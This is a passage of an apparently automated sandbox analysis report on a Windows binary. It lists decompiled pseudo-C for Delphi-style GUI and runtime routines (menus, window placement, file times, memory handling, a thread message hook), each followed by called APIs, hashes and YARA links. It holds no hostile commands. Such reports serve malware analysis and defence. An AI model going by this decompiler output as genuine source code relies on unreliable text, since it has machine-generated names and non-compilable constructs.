						_push(0xffffffff);
						_push(_t82);
						_push(_t66);
						L00406BD8();
						 *((intOrPtr*)(_v8 + 0x60)) = _t54;
						_push(_t66);
						L00406BA8();
					}
					E004202C4(_v8, _t66);
					_t58 =  *0x471788; // 0x2130b74
					E00414410(_t58, _t66, _t67, _v8, _t82);
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(0x423672);
					return E00420118(_v8);
				}
			}

0x0042358d
0x0042358f
0x00423592
0x00423595
0x0042359c
0x00423676
0x004235a2
0x004235a5
0x004235ac
0x004235ad
0x004235b2
0x004235b5
0x004235be
0x004235cf
0x004235da
0x004235df
0x004235e1
0x004235e6
0x004235f1
0x004235f6
0x0042360c
0x004235f8
0x00423602
0x00423602
0x00423615
0x00423618
0x0042361d
0x0042363b
0x0042361f
0x0042361f
0x00423621
0x00423622
0x00423623
0x0042362b
0x0042362e
0x0042362f
0x0042362f
0x00423643
0x0042364b
0x00423650
0x00423657
0x0042365a
0x0042365d
0x0042366a
0x0042366a

APIs

Part of subcall function 0041FF00: RtlEnterCriticalSection.KERNEL32(0048FA5C,00000000,0041E69E,00000000,0041E6FD), ref: 0041FF08
Part of subcall function 0041FF00: RtlLeaveCriticalSection.KERNEL32(0048FA5C,0048FA5C,00000000,0041E69E,00000000,0041E6FD), ref: 0041FF15
Part of subcall function 0041FF00: RtlEnterCriticalSection.KERNEL32(00000038,0048FA5C,0048FA5C,00000000,0041E69E,00000000,0041E6FD), ref: 0041FF1E

Part of subcall function 00424A88: 7378AC50.USER32(00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424ADE
Part of subcall function 00424A88: 7378AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424AF3
Part of subcall function 00424A88: 7378AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424AFD
Part of subcall function 00424A88: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424B21
Part of subcall function 00424A88: 7378B380.USER32(00000000,00000000,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424B2C

7378A590.GDI32(00000000,00000000,0042366B), ref: 004235E1
SelectObject.GDI32(00000000,?), ref: 004235FA
7378B410.GDI32(00000000,?,000000FF,00000000,00000000,0042366B), ref: 00423623
7378B150.GDI32(00000000,00000000,?,000000FF,00000000,00000000,0042366B), ref: 0042362F

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: 7378$CriticalSection$Enter$A590B150B380B410CreateHalftoneLeaveObjectPaletteSelect
String ID:
API String ID: 405406452-0
Opcode ID: ee446b714048a9a3972bb379847ff50ffe6c0961cc67a5fa75b666004e156bf9
Instruction ID: 4b527bdc50dd53449b6d4a18d3a84c12d955e69430b9cd1e95e9cb5721807436
Opcode Fuzzy Hash: ee446b714048a9a3972bb379847ff50ffe6c0961cc67a5fa75b666004e156bf9
Instruction Fuzzy Hash: 69312874B00624EFC714EF59D981D5DB7F9EF48710BA241A6A804AB362C638EE41DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0044C7CC, Relevance: 6.1, APIs: 4, Instructions: 72
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044C7CC(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
				intOrPtr _v8;
				void* __ecx;
				void* __edi;
				int _t27;
				void* _t40;
				int _t41;
				int _t50;

				_t50 = _t41;
				_t49 = __edx;
				_t40 = __eax;
				if(E0044BED8(__eax) == 0) {
					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
				}
				_v8 = 0;
				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
					_t27 = GetMenuItemID(_t49, _t50);
					_t51 = _t27;
					if(_t27 != 0xffffffff) {
						_v8 = E0044BD54(_t40, 0, _t51);
					}
				} else {
					_t49 = GetSubMenu(_t49, _t50);
					_v8 = E0044BD54(_t40, 1, _t37);
				}
				if(_v8 == 0) {
					return 0;
				} else {
					 *_a12 = 0;
					E00408C34(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
					return E00408B78(_a12, _t49);
				}
			}

0x0044c7d3
0x0044c7d5
0x0044c7d7
0x0044c7e2
0x00000000
0x0044c866
0x0044c7e6
0x0044c7f6
0x0044c813
0x0044c818
0x0044c81d
0x0044c82a
0x0044c82a
0x0044c7f8
0x0044c7ff
0x0044c80c
0x0044c80c
0x0044c831
0x00000000
0x0044c833
0x0044c836
0x0044c845
0x00000000
0x0044c84d

APIs

GetMenuState.USER32 ref: 0044C7EF
GetSubMenu.USER32 ref: 0044C7FA
GetMenuItemID.USER32(?,?), ref: 0044C813
GetMenuStringA.USER32(?,?,?,?,?), ref: 0044C866

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$ItemStateString
String ID:
API String ID: 306270399-0
Opcode ID: 5569887cdee20bc3490367aef116df7d1ba987bbf72b6eb07c89aecd37be188b
Instruction ID: da32e46d8a0416a672ed07a52e386dbb6f14a8052f38ecc0b14f60d6c126561f
Opcode Fuzzy Hash: 5569887cdee20bc3490367aef116df7d1ba987bbf72b6eb07c89aecd37be188b
Instruction Fuzzy Hash: 44116071601214ABDB40EA6ECC859AF77E8DF49365B14446FF819D7382C638DD02D7A8

Uniqueness

Uniqueness Score: -1.00%

Function 0045E5A8, Relevance: 6.1, APIs: 4, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045E5A8(intOrPtr* __eax, int __ecx, RECT* __edx) {
				int _t9;
				int _t12;
				int _t26;
				int _t34;
				int _t37;
				intOrPtr* _t43;
				int* _t44;

				_t37 = __ecx;
				_t44 = __edx;
				_t43 = __eax;
				_t9 = IsRectEmpty(__edx);
				_t47 = _t9;
				if(_t9 != 0) {
					return E0045E540(_t43, _t47);
				}
				 *((intOrPtr*)( *_t43 + 0x94))();
				__eflags = _t37;
				if(_t37 != 0) {
					L5:
					_t12 = 1;
				} else {
					_t34 = IsWindowVisible(E0043F370(_t43));
					__eflags = _t34;
					if(_t34 == 0) {
						goto L5;
					} else {
						_t12 = 0;
					}
				}
				E0045E4BC(_t43);
				SetWindowPos(E0043F370(_t43), 0,  *_t44, _t44[1], _t44[2] -  *_t44, _t44[3] - _t44[1], 0x48);
				 *((intOrPtr*)( *_t43 + 0xf8))();
				__eflags = _t12;
				if(__eflags != 0) {
					E0045E4BC(_t43);
				}
				_t26 = E004037B0( *((intOrPtr*)(_t43 + 0x240)), __eflags);
				__eflags = _t26;
				if(_t26 != 0) {
					return SetFocus(E0043F370(_t43));
				}
				return _t26;
			}

0x0045e5ac
0x0045e5ae
0x0045e5b0
0x0045e5b3
0x0045e5b8
0x0045e5ba
0x00000000
0x0045e5be
0x0045e5cc
0x0045e5d2
0x0045e5d4
0x0045e5eb
0x0045e5eb
0x0045e5d6
0x0045e5de
0x0045e5e3
0x0045e5e5
0x00000000
0x0045e5e7
0x0045e5e7
0x0045e5e7
0x0045e5e5
0x0045e5f1
0x0045e616
0x0045e61f
0x0045e625
0x0045e627
0x0045e62b
0x0045e62b
0x0045e63a
0x0045e63f
0x0045e641
0x00000000
0x0045e64b
0x0045e654

APIs

IsRectEmpty.USER32(?), ref: 0045E5B3
IsWindowVisible.USER32(00000000), ref: 0045E5DE
SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000048,?,?,?,?,0045E6BF,00463508), ref: 0045E616
SetFocus.USER32(00000000,?,?,?,?,00000048,?,?,?,?,0045E6BF,00463508), ref: 0045E64B

Part of subcall function 0045E540: IsWindowVisible.USER32(00000000), ref: 0045E557
Part of subcall function 0045E540: SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,004633B2,004633BA,?,?,0045ED10), ref: 0045E57E
Part of subcall function 0045E540: SetFocus.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,004633B2,004633BA,?,?,0045ED10), ref: 0045E59E

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$FocusVisible$EmptyRect
String ID:
API String ID: 698668684-0
Opcode ID: 14e1499886c9f27febb4d14d3eab02fc1becde214b25d5b5069d799ce34c2cf0
Instruction ID: b077f73e833ef18e89054b9c36e6e2196da467bc578b186032647e198170e437
Opcode Fuzzy Hash: 14e1499886c9f27febb4d14d3eab02fc1becde214b25d5b5069d799ce34c2cf0
Instruction Fuzzy Hash: 5F1191703006016BC614BA7B8C81A6BA38D9F4534AB08456AFD58DB383EA2CED0A5359

Uniqueness

Uniqueness Score: -1.00%

Function 00457C54, Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00457C54(void* __eax, void* __ecx, char __edx) {
				char _v12;
				struct HWND__* _v20;
				int _t17;
				void* _t27;
				struct HWND__* _t33;
				void* _t35;
				void* _t36;
				long _t37;

				_t37 = _t36 + 0xfffffff8;
				_t27 = __eax;
				_t17 =  *0x48fbfc; // 0x2131310
				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
						_v12 = __edx;
						EnumWindows(E00457BE4, _t37);
						_t5 = _t27 + 0x90; // 0x0
						_t17 =  *_t5;
						if( *((intOrPtr*)(_t17 + 8)) != 0) {
							_t33 = GetWindow(_v20, 3);
							_v20 = _t33;
							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
								_v20 = 0xfffffffe;
							}
							_t10 = _t27 + 0x90; // 0x0
							_t17 =  *_t10;
							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
							if(_t35 >= 0) {
								do {
									_t13 = _t27 + 0x90; // 0x0
									_t17 = SetWindowPos(E004140D0( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
									_t35 = _t35 - 1;
								} while (_t35 != 0xffffffff);
							}
						}
					}
					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
				}
				return _t17;
			}

0x00457c56
0x00457c59
0x00457c5b
0x00457c64
0x00457c71
0x00457c7a
0x00457c7d
0x00457c89
0x00457c8e
0x00457c8e
0x00457c98
0x00457ca6
0x00457ca8
0x00457cb5
0x00457cb7
0x00457cb7
0x00457cbe
0x00457cbe
0x00457cc7
0x00457ccb
0x00457ccd
0x00457ce1
0x00457ced
0x00457cf2
0x00457cf3
0x00457ccd
0x00457ccb
0x00457c98
0x00457cf8
0x00457cf8
0x00457d02

APIs

EnumWindows.USER32(00457BE4), ref: 00457C89
GetWindow.USER32(00000003,00000003), ref: 00457CA1
GetWindowLongA.USER32 ref: 00457CAE
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 00457CED

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$EnumLongWindows
String ID:
API String ID: 4191631535-0
Opcode ID: 5837f7ba724a181cafce3f75d663f5c85bdaa1754f31eab1de7ce17710d96d61
Instruction ID: 9bd6c767c6febb2a3f0accd41cfd350b3a3ee52f636edb9722bae87866f451f4
Opcode Fuzzy Hash: 5837f7ba724a181cafce3f75d663f5c85bdaa1754f31eab1de7ce17710d96d61
Instruction Fuzzy Hash: 57115E30608210AFD711EA29E885F9A77D4AB05765F15027AFD68AF2D3C3789C84C759

Uniqueness

Uniqueness Score: -1.00%

Function 004088D4, Relevance: 6.0, APIs: 4, Instructions: 39
timefileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004088D4(WORD* __eax) {
				struct _FILETIME _v12;
				long _t20;
				WORD* _t30;
				void* _t35;
				struct _FILETIME* _t36;

				_t36 = _t35 + 0xfffffff8;
				_t30 = __eax;
				while((_t30[0xc].dwFileAttributes & _t30[8]) != 0) {
					if(FindNextFileA(_t30[0xa],  &(_t30[0xc])) != 0) {
						continue;
					} else {
						_t20 = GetLastError();
					}
					L5:
					return _t20;
				}
				FileTimeToLocalFileTime( &(_t30[0x16]), _t36);
				FileTimeToDosDateTime( &_v12,  &(_t30[1]), _t30);
				_t30[2] = _t30[0x1c];
				_t30[4] = _t30[0xc].dwFileAttributes;
				E00404588( &(_t30[6]), 0x104,  &(_t30[0x22]));
				_t20 = 0;
				goto L5;
			}

0x004088d5
0x004088d8
0x004088f4
0x004088eb
0x00000000
0x004088ed
0x004088ed
0x004088ed
0x00408933
0x00408936
0x00408936
0x00408901
0x00408910
0x00408918
0x0040891e
0x0040892c
0x00408931
0x00000000

APIs

FindNextFileA.KERNEL32(?,?), ref: 004088E4
GetLastError.KERNEL32(?,?), ref: 004088ED
FileTimeToLocalFileTime.KERNEL32(?), ref: 00408901
FileTimeToDosDateTime.KERNEL32 ref: 00408910

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: FileTime$DateErrorFindLastLocalNext
String ID:
API String ID: 2103556486-0
Opcode ID: 55f3200e7f87359629114914a74fd0bdb901e704791539bb3e52001bb53133f2
Instruction ID: b2e1fed48c8f422ee2b5e5743327b4e038b85d2b22b747623e64466df017a0cf
Opcode Fuzzy Hash: 55f3200e7f87359629114914a74fd0bdb901e704791539bb3e52001bb53133f2
Instruction Fuzzy Hash: B5F06DB25002009FCB44FFA5C9C288733ACEB4831075084BBAD05EB28BEA38E55587A9

Uniqueness

Uniqueness Score: -1.00%

Function 00457570, Relevance: 6.0, APIs: 4, Instructions: 34
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00457570(void* __ecx) {
				void* _t2;
				DWORD* _t7;

				_t2 =  *0x48fbfc; // 0x2131310
				if( *((char*)(_t2 + 0xa5)) == 0) {
					if( *0x48fc14 == 0) {
						_t2 = SetWindowsHookExA(3, E0045752C, 0, GetCurrentThreadId());
						 *0x48fc14 = _t2;
					}
					if( *0x48fc10 == 0) {
						_t2 = CreateEventA(0, 0, 0, 0);
						 *0x48fc10 = _t2;
					}
					if( *0x48fc18 == 0) {
						_t2 = CreateThread(0, 0x3e8, E004574D0, 0, 0, _t7);
						 *0x48fc18 = _t2;
					}
				}
				return _t2;
			}

0x00457571
0x0045757d
0x00457586
0x00457598
0x0045759d
0x0045759d
0x004575a9
0x004575b3
0x004575b8
0x004575b8
0x004575c4
0x004575d7
0x004575dc
0x004575dc
0x004575c4
0x004575e2

APIs

GetCurrentThreadId.KERNEL32 ref: 00457588
SetWindowsHookExA.USER32 ref: 00457598
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004575B3
CreateThread.KERNEL32 ref: 004575D7

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateThread$CurrentEventHookWindows
String ID:
API String ID: 1195359707-0
Opcode ID: c5de43db9f6cbb411724523a7b88322c2eed72ad72aa3c98ac46cf96fd0177d3
Instruction ID: 5d711aba6c396b4f3788007058525e9a7d610057fcd7099d041e4e76e9cb2673
Opcode Fuzzy Hash: c5de43db9f6cbb411724523a7b88322c2eed72ad72aa3c98ac46cf96fd0177d3
Instruction Fuzzy Hash: 08F030B0A89308BEF7106725BD06F1A3554B311B06F60543EFE056D1D2D7B817E8879D

Uniqueness

Uniqueness Score: -1.00%

Function 00407224, Relevance: 6.0, APIs: 4, Instructions: 11
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407224(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}

0x00407227
0x0040722e
0x00407233
0x00407239
0x0040723e

APIs

GlobalHandle.KERNEL32 ref: 00407227
GlobalUnWire.KERNEL32(00000000), ref: 0040722E
GlobalReAlloc.KERNEL32 ref: 00407233
GlobalFix.KERNEL32 ref: 00407239

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocHandleWire
String ID:
API String ID: 2210401237-0
Opcode ID: bbb00e0be71c8f6aa3260edcd61b9b76f434907876f5cb2297e6b668732544bd
Instruction ID: ab20af19cc851b5b57b0214bf18fc3e810406dd13a077be7de484e3b879df495
Opcode Fuzzy Hash: bbb00e0be71c8f6aa3260edcd61b9b76f434907876f5cb2297e6b668732544bd
Instruction Fuzzy Hash: 44B009E495020038E80433F24E0FE7B402C98907093824A7EB846F2882D87CA864443D

Uniqueness

Uniqueness Score: -1.00%

Function 00437244, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00437244(char __eax) {
				char _v5;
				char _v6;
				intOrPtr _v10;
				intOrPtr _v14;
				void* __ebx;
				void* __ebp;
				char _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				intOrPtr _t51;
				void* _t52;
				char _t53;
				struct HICON__* _t54;
				intOrPtr _t59;
				intOrPtr _t63;
				intOrPtr* _t67;
				intOrPtr _t69;
				void* _t70;
				intOrPtr _t73;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr _t87;
				intOrPtr* _t93;
				void* _t96;
				intOrPtr _t100;
				intOrPtr _t107;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr _t126;
				intOrPtr _t128;
				void* _t130;
				void* _t131;
				void* _t133;
				void* _t135;
				intOrPtr _t136;

				_t44 = __eax;
				_t133 = _t135;
				_t136 = _t135 + 0xfffffff4;
				_v5 = __eax;
				_t93 = 0;
				_v6 = 0;
				if( *0x48fb84 == 0) {
					L34:
					return _t44;
				} else {
					_t44 =  *0x48fb84; // 0x0
					if( *((char*)(_t44 + 0x30)) != 0) {
						goto L34;
					} else {
						_push(_t133);
						_push(0x437510);
						_push( *[fs:edx]);
						 *[fs:edx] = _t136;
						_t45 =  *0x48fb84; // 0x0
						 *0x48fbb0 = _t45;
						_push(_t133);
						_push(0x43749e);
						_push( *[fs:edx]);
						 *[fs:edx] = _t136;
						_t46 =  *0x48fb84; // 0x0
						 *((char*)(_t46 + 0x30)) = 1;
						_t47 =  *0x48fb84; // 0x0
						 *((char*)(_t47 + 0x1c)) = _v5;
						_t107 =  *0x48fb8c; // 0x0
						E00436124(_t107);
						if( *0x48fba0 == 2) {
							_t87 =  *0x48fb84; // 0x0
							_t128 =  *0x433bf0; // 0x433c3c
							_t93 = E00403764(_t87, _t128);
							 *((char*)(_t93 + 0x6c)) =  *((intOrPtr*)( *_t93 + 0x34))() & 0xffffff00 |  *((intOrPtr*)(_t93 + 4)) == 0x00000000;
						}
						_t50 =  *0x48fb84; // 0x0
						if( *((intOrPtr*)(_t50 + 4)) == 0) {
							L7:
							_t51 =  *0x48fb84; // 0x0
							_v14 =  *((intOrPtr*)(_t51 + 0xc));
							_t109 =  *((intOrPtr*)(_t51 + 0x10));
							_v10 =  *((intOrPtr*)(_t51 + 0x10));
						} else {
							_t83 =  *0x48fb84; // 0x0
							_t126 =  *0x434730; // 0x43477c
							if(E00403740( *((intOrPtr*)(_t83 + 4)), _t126) == 0) {
								goto L7;
							} else {
								_t86 =  *0x48fb84; // 0x0
								_v14 =  *((intOrPtr*)(_t86 + 0x14));
								_t109 =  *((intOrPtr*)(_t86 + 0x18));
								_v10 =  *((intOrPtr*)(_t86 + 0x18));
							}
						}
						_t52 = E004371D0(_t133);
						_pop(_t96);
						if(_t52 == 0) {
							L14:
							_t53 = 0;
						} else {
							if( *0x48fba0 != 2 ||  *((char*)(_t93 + 0x6c)) == 0) {
								if( *0x48fba0 == 0) {
									goto L14;
								} else {
									E00436AFC(1);
									if(1 == 0) {
										goto L14;
									} else {
										goto L13;
									}
								}
							} else {
								L13:
								if(_v5 != 0) {
									_t53 = 1;
								} else {
									goto L14;
								}
							}
						}
						_v6 = _t53;
						if( *0x48fba0 != 2) {
							__eflags =  *0x48fba4;
							if(__eflags == 0) {
								_t54 =  *0x48fb98; // 0x0
								SetCursor(_t54);
							} else {
								_t73 =  *0x48fba4; // 0x0
								E00440E7C(_t73, _t109, __eflags);
							}
						} else {
							if(_v6 != 0 &&  *((char*)(_t93 + 0x6c)) != 0) {
								_t76 = E004500B0( *((intOrPtr*)(_t93 + 0x38)));
								if(_t76 != 0 &&  *((intOrPtr*)(_t76 + 0x220)) ==  *((intOrPtr*)(_t93 + 0x38))) {
									E00453D20(_t76, _t93, _t96, 0, _t130, _t131);
								}
								_t77 =  *0x48fb84; // 0x0
								_t78 =  *0x48fb80; // 0x0
								E00439EA4(_t78, 0, 0xb03a, _t77);
							}
						}
						 *0x48fb80 = 0;
						 *0x48fb84 = 0;
						if( *0x48fbb0 != 0) {
							_t69 =  *0x48fbb0; // 0x0
							if( *((intOrPtr*)(_t69 + 4)) != 0) {
								_t70 = 3;
								if(_v6 == 0) {
									_t70 = 4;
									_t119 =  *0x48fbb0; // 0x0
									 *((intOrPtr*)(_t119 + 0xc)) = 0;
									_t120 =  *0x48fbb0; // 0x0
									 *((intOrPtr*)(_t120 + 0x10)) = 0;
									_v14 = 0;
									_v10 = 0;
								}
								_t112 =  *0x48fbb0; // 0x0
								_t114 =  *0x48fbb0; // 0x0
								_t116 =  *0x48fbb0; // 0x0
								_t100 =  *0x48fbb0; // 0x0
								E004369E0( *((intOrPtr*)(_t116 + 8)), _t100, _t70, _t114 + 0xc,  *((intOrPtr*)(_t112 + 4)));
							}
						}
						_pop(_t110);
						 *[fs:eax] = _t110;
						_push(0x4374a5);
						_t59 =  *0x48fbac; // 0x0
						E004035B4(_t59);
						 *0x48fbac = 0;
						if( *0x48fbb0 != 0) {
							_t63 =  *0x48fbb0; // 0x0
							 *((char*)(_t63 + 0x30)) = 0;
							_t67 =  *0x48fbb0; // 0x0
							 *((intOrPtr*)( *_t67))(_v6, _v10);
						}
						 *0x48fb84 = 0;
						return 0;
					}
				}
			}

0x00437244
0x00437245
0x00437247
0x0043724b
0x0043724e
0x00437250
0x0043725b
0x00437517
0x0043751b
0x00437261
0x00437261
0x0043726a
0x00000000
0x00437270
0x00437272
0x00437273
0x00437278
0x0043727b
0x0043727e
0x00437283
0x0043728a
0x0043728b
0x00437290
0x00437293
0x00437296
0x0043729b
0x0043729f
0x004372a7
0x004372aa
0x004372b5
0x004372c1
0x004372c3
0x004372c8
0x004372d3
0x004372e3
0x004372e3
0x004372e6
0x004372ef
0x0043731b
0x0043731b
0x00437323
0x00437326
0x00437329
0x004372f1
0x004372f1
0x004372f9
0x00437306
0x00000000
0x00437308
0x00437308
0x00437310
0x00437313
0x00437316
0x00437316
0x00437306
0x0043732d
0x00437332
0x00437335
0x00437360
0x00437360
0x00437337
0x0043733e
0x0043734d
0x00000000
0x0043734f
0x00437351
0x00437358
0x00000000
0x00000000
0x00000000
0x00000000
0x00437358
0x0043735a
0x0043735a
0x0043735e
0x00437364
0x00000000
0x00000000
0x00000000
0x0043735e
0x0043733e
0x00437366
0x00437370
0x004373b5
0x004373bc
0x004373ca
0x004373d0
0x004373be
0x004373be
0x004373c3
0x004373c3
0x00437372
0x00437376
0x00437381
0x00437388
0x00437397
0x00437397
0x0043739c
0x004373a9
0x004373ae
0x004373ae
0x00437376
0x004373d7
0x004373de
0x004373ea
0x004373ec
0x004373f5
0x004373f7
0x004373fd
0x004373ff
0x00437401
0x00437409
0x0043740c
0x00437414
0x00437419
0x0043741e
0x0043741e
0x00437421
0x0043742b
0x00437435
0x0043743e
0x00437445
0x00437445
0x004373f5
0x0043744c
0x0043744f
0x00437452
0x00437457
0x0043745c
0x00437463
0x0043746f
0x00437471
0x00437476
0x0043748d
0x00437494
0x00437494
0x00437498
0x0043749d
0x0043749d
0x0043726a

APIs

Part of subcall function 00436124: ReleaseCapture.USER32(00000000,004372BA,00000000,0043749E,?,00000000,00437510,?,00000001), ref: 00436127

SetCursor.USER32(00000000,00000000,0043749E,?,00000000,00437510,?,00000001), ref: 004373D0

Part of subcall function 00440E7C: 73D61770.COMCTL32(00000000,?,00436D95), ref: 00440E98
Part of subcall function 00440E7C: ShowCursor.USER32(000000FF,00000000,?,00436D95), ref: 00440EB3

Strings

<<C, xrefs: 004372C8
|GC, xrefs: 004372F9

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$CaptureD61770ReleaseShow
String ID: <<C$|GC
API String ID: 3570427040-3155334562
Opcode ID: 5df990364465969901304e1b29b66484120dc796d59716d242e3edc6ecfbf381
Instruction ID: 686fcaf825e4e13a299f6afb46c2b8e7626cb9d1648d8efe1c0b847c8351f824
Opcode Fuzzy Hash: 5df990364465969901304e1b29b66484120dc796d59716d242e3edc6ecfbf381
Instruction Fuzzy Hash: BE719FB5618240DFD724CF69D8A5B5A7BF1BB8C354F44D8BED8408B362D338A949DB08

Uniqueness

Uniqueness Score: -1.00%

Function 0043700C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0043700C(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __fp0) {
				intOrPtr _v8;
				intOrPtr* _v12;
				struct tagPOINT _v20;
				intOrPtr _v24;
				char _v28;
				char _v36;
				void* __edi;
				void* __ebp;
				intOrPtr _t54;
				intOrPtr _t60;
